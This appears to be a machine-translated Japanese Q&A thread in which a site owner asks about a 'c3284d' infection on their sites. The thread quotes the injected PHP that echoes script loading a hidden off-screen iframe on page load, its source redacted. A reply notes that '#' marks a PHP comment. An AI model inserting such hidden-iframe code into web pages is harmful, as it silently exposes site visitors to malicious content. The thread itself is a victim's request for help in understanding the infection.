1

重複の可能性:
検索と置換を使用して、c3284d ウイルスに感染したサーバーを駆除する

今日、私のサイトのいくつかでこのスクリプトを見つけました。スクリプトが何をするかは知っていますが、ハッシュ化されたものは何をしますか? ftp ツールに影響しますか? コンテンツを含むファイルをダウンロードできませんか? これはサーバー側の問題ですか? 私が使用しているテーマは Dynamix です。そのテーマには既知の穴がありますか、それとも私のホストであると考えるのは正しいですか? ファイルを ftp でダウンロードまたは編集できないのはなぜですか?

#c3284d#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = \"***redacted***\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
 };
 window.onload = frmAdd;
 </script>
";
 #/c3284d#

私はサイトのバックアップを持っているので、すべてを検索して置き換えることには興味がありません! ユーザーが言ったように、1つのエラーをきれいにすると、さらに多くのエラーが表示されるからです!

4

1 に答える 1

1

PHPのハッシュは同等な// ので単なるコメントです

彼らはおそらくあなたのページを解析し、その値を探して、その間にあるすべてのものを取ります.

于 2012-08-18T01:03:59.557 に答える